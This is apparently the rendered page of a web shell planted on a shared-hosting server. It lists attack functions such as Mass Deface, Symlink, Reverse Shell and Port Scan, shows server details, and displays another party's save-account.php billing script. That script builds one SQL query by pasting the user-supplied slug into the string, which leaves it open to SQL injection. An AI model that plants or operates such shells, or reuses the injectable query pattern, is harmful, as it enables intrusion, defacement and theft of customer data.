Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
ccyne
/
api
/
Viewing: save-account.php
<?php header('Content-Type: application/json'); include 'db.php'; $data = json_decode(file_get_contents("php://input"), true); $slug = $data['slug']; $customer = $data['customerName']; $doc = $data['docNumber']; $currency = $data['currency']; $status = $data['status']; $notes = $data['notes']; $type = isset($data['type']) ? $data['type'] : 'cobro'; $startDate = isset($data['startDate']) && !empty($data['startDate']) ? $data['startDate'] : null; $endDate = isset($data['endDate']) && !empty($data['endDate']) ? $data['endDate'] : null; $subtotal = 0; $discount = 0; $total = 0; $paid = 0; foreach($data['items'] as $item){ $subtotal += $item['quantity'] * $item['unitPrice']; $discount += $item['discount']; } $total = $subtotal - $discount; foreach($data['payments'] as $p){ $paid += $p['amount']; } $balance = $total - $paid; $stmt = $conn->prepare("INSERT INTO accounts( slug, customer_name, doc_number, currency, status, notes, subtotal, discount_total, total, paid, balance, type, start_date, end_date ) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?) ON DUPLICATE KEY UPDATE customer_name=VALUES(customer_name), doc_number=VALUES(doc_number), currency=VALUES(currency), status=VALUES(status), notes=VALUES(notes), subtotal=VALUES(subtotal), discount_total=VALUES(discount_total), total=VALUES(total), paid=VALUES(paid), balance=VALUES(balance), type=VALUES(type), start_date=VALUES(start_date), end_date=VALUES(end_date)"); $stmt->bind_param( "ssssssdddddsss", $slug, $customer, $doc, $currency, $status, $notes, $subtotal, $discount, $total, $paid, $balance, $type, $startDate, $endDate ); $stmt->execute(); $accountId = $conn->insert_id; if($accountId == 0){ $query = $conn->query("SELECT id FROM accounts WHERE slug='$slug'"); $row = $query->fetch_assoc(); $accountId = $row['id']; } $conn->query("DELETE FROM account_items WHERE account_id=$accountId"); $conn->query("DELETE FROM payments WHERE account_id=$accountId"); foreach($data['items'] as $item){ $quantity = $item['quantity']; $description = $item['description']; $unitPrice = $item['unitPrice']; $discountAmount = $item['discount']; $lineTotal = ($quantity * $unitPrice) - $discountAmount; $stmt2 = $conn->prepare("INSERT INTO account_items( account_id, quantity, description, unit_price, discount_amount, total ) VALUES(?,?,?,?,?,?)"); $stmt2->bind_param( "idsddd", $accountId, $quantity, $description, $unitPrice, $discountAmount, $lineTotal ); $stmt2->execute(); } foreach($data['payments'] as $payment){ $date = $payment['date']; $amount = $payment['amount']; $note = $payment['note']; $stmt3 = $conn->prepare("INSERT INTO payments( account_id, payment_date, amount, note ) VALUES(?,?,?,?)"); $stmt3->bind_param( "isds", $accountId, $date, $amount, $note ); $stmt3->execute(); } $pdfUrl = "api/generate-pdf.php?slug=".$slug; $response = [ "success" => true, "slug" => $slug, "pdf" => $pdfUrl, "url" => "cobro/".$slug ]; echo json_encode($response); ?>
Coded With 💗 by
0x6ick